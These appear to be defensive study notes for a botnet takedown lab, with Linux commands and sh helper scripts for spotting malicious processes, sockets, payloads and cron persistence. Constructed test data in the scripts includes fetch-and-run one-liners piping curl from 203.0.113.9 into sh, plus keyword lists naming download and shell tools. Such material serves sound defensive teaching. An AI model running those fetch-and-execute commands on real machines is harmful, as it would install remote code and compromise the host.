1. Botnet Takedown Challenge
- Investigate the infected machine, identify IOCs (Indicators of Compromise), find the malware or script, determine how it works, and neutralize the botnet connection.
2. Botnet?
- A botnet is a network of infected computers (bots) controlled by a central attacker (botmaster).
- These bots may receive commands via C2 servers, IRC servers, web requests, or reverse shells
3. What is a C2 (Command & Control)?
- A C2 server is what the malware connects back to
- like HQ for the bots
4. Files and Directories to Investigate
- /tmp/, /var/tmp/, /dev/shm/ : often used by malware to store payloads
- /etc/cron* : persistent scheduled execution
- ~/.bashrc, ~/.profile : startup scripts
- /etc/systemd/system/ : malicious services may be installed
5. Path
1) Detect the Bot
(1) ps aux
Lists all running processes on the system as a static snapshot.
- a : show processes for all users, not just you
- u : show user/owner of the process
- x : show processes not attached to a terminal (like background daemons or malware)
(2) top
Shows live, real-time process activity, like Task Manager in terminal form.
Great for spotting malware using lots of CPU or RAM.
top
- q : quit
- k : kill a process (enter PID)
- P : sort by CPU
- M : sort by memory
(3) netstat -tulnp
Shows network connections and listening ports
- t : TCP connections only
- u : UDP connections only
- l : show listening ports (services waiting for connections)
- n : show numeric IPs/ports (instead of resolving names)
- p : show the PID/program name using the port
sudo netstat -tulnp
(4) ss -tulnp
A faster, modern alternative to netstat
(5) sudo lsof -i
LiSt Open Files (lsof) that are network-related
- i : internet-related files. It shows any process that is connected to an IP address, is listening on a port, or is using TCP or UDP
sudo lsof -i
- Look for weird external IPs, strange ports like 1337, 6667, 8080, etc.
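The port check above, as an added example that is not part of the original notes: a POSIX sh function that reads ss -tunap style lines from stdin and flags any socket whose local or peer port is on a watch list. The port list and the sample lines are constructed assumptions, not output captured from a real host.

```sh
#!/bin/sh
# Added example, not from the original notes: flag sockets whose local or
# peer port is on a watch list, reading ss -tunap style lines from stdin.
# The port list and the sample lines below are constructed assumptions.

# Ports the notes above call out as worth a second look (plus 4444, a common
# reverse-shell default). Adjust for your environment.
SUSPICIOUS_PORTS="1337 6667 8080 4444"

# flag_suspicious_ports: for each input line whose local or peer port is in
# SUSPICIOUS_PORTS, print "port:program:pid". The header line is skipped and
# program/pid are pulled from ss's users:(("name",pid=N,fd=M)) column.
flag_suspicious_ports() {
    while read -r netid state recvq sendq laddr paddr process; do
        case "$netid" in Netid|'') continue ;; esac
        lport="${laddr##*:}"   # text after the last ':' is the port
        pport="${paddr##*:}"
        for p in $SUSPICIOUS_PORTS; do
            if [ "$lport" = "$p" ] || [ "$pport" = "$p" ]; then
                prog="$(printf '%s' "$process" | sed -n 's/.*users:(("\([^"]*\)".*/\1/p')"
                pid="$(printf '%s' "$process" | sed -n 's/.*pid=\([0-9]*\).*/\1/p')"
                printf '%s:%s:%s\n' "$p" "${prog:-unknown}" "${pid:-?}"
                break
            fi
        done
    done
}

# Constructed sample in ss -tunap format. Against a live box run:
#   sudo ss -tunap | flag_suspicious_ports
# Expected here: 1337:python3:4242 and 6667:bash:4300 (sshd and DNS are not flagged).
flag_suspicious_ports <<'EOF'
Netid State  Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
udp   UNCONN 0      0      127.0.0.53%lo:53     0.0.0.0:*           users:(("systemd-resolve",pid=500,fd=12))
tcp   LISTEN 0      128    0.0.0.0:22           0.0.0.0:*           users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      5      0.0.0.0:1337         0.0.0.0:*           users:(("python3",pid=4242,fd=4))
tcp   ESTAB  0      0      10.0.0.5:51234       203.0.113.9:6667    users:(("bash",pid=4300,fd=3))
EOF
```

Checking the peer port as well as the local port matters: a bot that has already connected out to IRC on 6667 does not listen on anything, so ss -tulnp (listeners only) would never show it; ss -tunap includes established connections.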
2) Find the Malware File
ls -lah /tmp /var/tmp /dev/shm
- a : show hidden files
- h : human-readable sizes
(1) Find hidden files (.*) anywhere on the system
find / -type f -iname ".*" 2>/dev/null
(2) Find recent files modified in the last 60 minutes
find / -type f -mmin -60 2>/dev/null
- you can use this to catch recently dropped payloads
(3) Use the file command to see whether it is a script or an ELF binary
- ELF : Executable and Linkable Format. The standard binary format for Linux executables
- If file reports an unknown file as ELF, it is likely a compiled executable (possibly malicious)
Python script -> readable and easy to analyze
ELF 64-bit executable -> compiled malware (harder, needs strings, Ghidra, etc.)
3) Analyze the Malware
- If it's a script:
cat suspicious.sh
- If it's an ELF binary:
strings suspicious_elf | less
Check if it contains:
- C2 IP or domain
- commands like curl, wget, rm, chmod, etc.
- Python or bash code that loops or connects outward
4) Check for Obfuscation or Encoding
If you see things like:
exec(base64.b64decode("aW1wb3J0IG9zCg=="))
It's obfuscated.
(1) Decode Base64 in terminal
echo "aW1wb3J0IG9zCg==" | base64 -d
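The decode step above plus the IOC checks from "Analyze the Malware", as an added example that is not part of the original notes: decode a base64 blob and grep the plaintext for the command keywords and IP addresses the notes tell you to look for. The blob aW1wb3J0IG9zCg== is the one from the notes; the second sample is constructed here (and encoded inside the script so the example stays self-contained).

```sh
#!/bin/sh
# Added example, not from the original notes: decode a base64 blob found in a
# suspicious script and scan the plaintext for the IOCs listed in the notes
# (C2 IP/domain, curl, wget, rm, chmod, ...). Samples are constructed.

# decode_b64: print the decoded form of its argument (GNU base64 -d, as in
# the notes). Returns non-zero if the argument is not valid base64.
decode_b64() {
    printf '%s' "$1" | base64 -d
}

# find_iocs: read plaintext on stdin, print one line per command keyword
# found ("cmd:curl") and one per distinct IPv4 address ("ip:203.0.113.9").
# The keyword list is an assumption; extend it for your case.
find_iocs() {
    text="$(cat)"
    for kw in curl wget chmod rm nc bash sh; do
        if printf '%s\n' "$text" | grep -qw "$kw"; then
            printf 'cmd:%s\n' "$kw"
        fi
    done
    printf '%s\n' "$text" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u | sed 's/^/ip:/'
}

# The blob from the notes decodes to a harmless-looking "import os".
decode_b64 "aW1wb3J0IG9zCg=="

# Constructed sample of the kind of thing obfuscation usually hides: a
# one-line downloader. Encoded here rather than pasted in as base64.
SAMPLE_B64="$(printf 'import os\nos.system("curl http://203.0.113.9:1337/bot.sh | sh")\n' | base64)"

# Expected: cmd:curl, cmd:sh, ip:203.0.113.9 (wget, chmod, rm are absent).
decode_b64 "$SAMPLE_B64" | find_iocs
```

If the decoded text is itself another base64 blob or a compressed stream (zlib, gzip), feed it back through decode_b64 or the matching decompressor and rescan; obfuscated droppers are frequently nested several layers deep.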
5) Trace Persistence
(1) check crontab
crontab -l
- l : lists the cron jobs for the current user
cat /etc/crontab
ls -l /etc/cron.*/*
(2) Check systemd services
systemctl list-units --type=service | grep suspicious
(3) Look at user .bashrc or .profile
- .bashrc : A hidden config file in a user's home directory. It runs every time you open a terminal.
cat ~/.bashrc
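The persistence review above, as an added example that is not part of the original notes: a POSIX sh function that reads crontab lines (from crontab -l, /etc/crontab or /etc/cron.*/*) on stdin and flags entries that reference the payload directories from section 4, download tools, base64, or @reboot. The sample crontab lines are constructed.

```sh
#!/bin/sh
# Added example, not from the original notes: triage crontab lines for the
# persistence patterns the notes describe. Sample lines are constructed.

# flag_cron_entries: for each non-comment line that matches one or more
# patterns, print "reason[,reason]:line". Reasons:
#   reboot   - runs at every boot (@reboot)
#   tmpdir   - references /tmp, /var/tmp or /dev/shm (payload drop dirs)
#   download - invokes curl or wget
#   encoded  - contains base64 (inline obfuscated payload)
flag_cron_entries() {
    while IFS= read -r line; do
        case "$line" in ''|\#*) continue ;; esac
        reasons=""
        case "$line" in @reboot*) reasons="${reasons}reboot," ;; esac
        case "$line" in */tmp/*|*/var/tmp/*|*/dev/shm/*) reasons="${reasons}tmpdir," ;; esac
        case "$line" in *curl*|*wget*) reasons="${reasons}download," ;; esac
        case "$line" in *base64*) reasons="${reasons}encoded," ;; esac
        if [ -n "$reasons" ]; then
            printf '%s:%s\n' "${reasons%,}" "$line"
        fi
    done
}

# Constructed crontab. Against a live box run, for example:
#   crontab -l | flag_cron_entries
#   cat /etc/crontab /etc/cron.*/* 2>/dev/null | flag_cron_entries
# Expected here: the @reboot line (reboot,tmpdir) and the curl line (download).
flag_cron_entries <<'EOF'
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot /bin/bash /tmp/.bot.sh
*/5 * * * * curl -s http://203.0.113.9/c | sh
0 2 * * * /usr/bin/apt-get update
EOF
```

Treat a hit as a lead, not a verdict: legitimate jobs do write to /tmp, so open the referenced file with cat or strings as in section 3 before removing anything, and record the line so the persistence can be documented alongside the malware sample.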
6) Take It Down
Once you have found the malware and know how it connects:
(1) Kill the process
sudo kill -9 <pid>
(2) Delete the file
sudo rm -f /tmp/bot.sh
(3) Remove from persistence
sudo crontab -r
- r : deletes all cron jobs for the current user (with sudo that is root's crontab; run it without sudo to clear your own user's jobs)